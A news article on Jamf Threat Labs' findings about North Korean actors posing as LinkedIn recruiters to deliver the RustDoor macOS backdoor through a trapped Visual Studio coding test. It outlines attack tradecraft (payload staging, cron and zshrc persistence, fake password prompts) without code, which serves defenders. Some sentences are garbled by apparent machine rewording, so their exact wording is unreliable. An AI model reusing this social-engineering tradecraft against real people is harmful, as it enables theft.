Cybersecurity researchers continue to warn of attempts by North Korean actors to target potential victims on LinkedIn to spread malware called RustDoor.
The latest advisory comes from Jamf Threat Labs, which said it spotted an attempted attack in which a user was contacted on the professional social network pretending to be a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.
This malicious cyber activity is part of a multi-pronged campaign launched by cyber threat actors backed by the Democratic People’s Republic of Korea (DPRK) to infiltrate networks of interest under the guise of conducting interviews or completing coding tasks .
The financial and cryptocurrency industries are among the primary targets of state-sponsored adversaries seeking to generate illicit revenue and achieve an ever-changing set of goals based on regime interests.
These attacks manifest themselves as “highly personalized and hard-to-detect social engineering campaigns” targeting employees of decentralized finance (“DeFi”), cryptocurrencies, and similar businesses, as recently highlighted by the Federal United States Bureau of Investigation (FBI). ) in a review.
One notable indicator of North Korean social engineering activity involves requests to execute code or download applications on company-owned devices or devices with access to a company’s internal network. business.
Another aspect worth mentioning is that such attacks also involve “requests to run a ‘pre-use test’ or debugging exercise that involves running Node.js packages non-standard or unknown PyPI packages, scripts or GitHub repositories.
Examples of such tactics have been widely documented in recent weeks, highlighting a persistent evolution of the tools used in these campaigns against targets.
The latest attack chain detected by Jamf involves tricking the victim into downloading a trapped Visual Studio project as part of an alleged coding challenge that embeds bash commands to download two different second-stage payloads (“VisualStudioHelper” and “zsh_env”). with identical functionality.
This second-stage malware is RustDoor, which the company tracks under the name Thiefbucket. At the time of writing, none of the anti-malware engines have reported the encoding test file compressed as malicious. It was posted online on the VirusTotal platform on August 7, 2024.
“Configuration files embedded in the two separate malware samples show that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file,” said researchers Jaron Bradley and Ferdous Saljooki.
RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 as part of a malware campaign targeting cryptocurrency companies. A subsequent analysis by S2W discovered a Golang variant called GateDoor, intended to infect Windows machines.
Jamf’s findings are significant not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also because the malware is written in Objective-C.
“The tactics and techniques used (in the campaign) are very closely aligned with what the FBI and many others in the industry are seeing,” Jaron Bradley, director of Jamf Threat Labs, told The Hacker News.
“Many of the targets, techniques and objectives of the attack discussed closely align with other cyber activities originating from the DPRK over the past two years (Operation Dream Job, RustBucket).”
VisualStudioHelper is also designed to act as an information thief by harvesting files specified in the configuration, but only after prompting the user for their system password by hiding it as if it came from the Visual Studio application to avoid arousing suspicion.
However, the two payloads operate as a backdoor and use two different servers for command and control (C2) communications.
“Malicious actors continue to remain vigilant to find new ways to pursue crypto industry players,” the researchers said. “It is important to train your employees, including your developers, not to trust those who go online and ask users to run software of any type.
“These social engineering projects implemented by the DPRK come from people who have a good command of English and who enter into the conversation after having studied their target well.”
(The story was updated after publication to include additional responses from Jamf.)
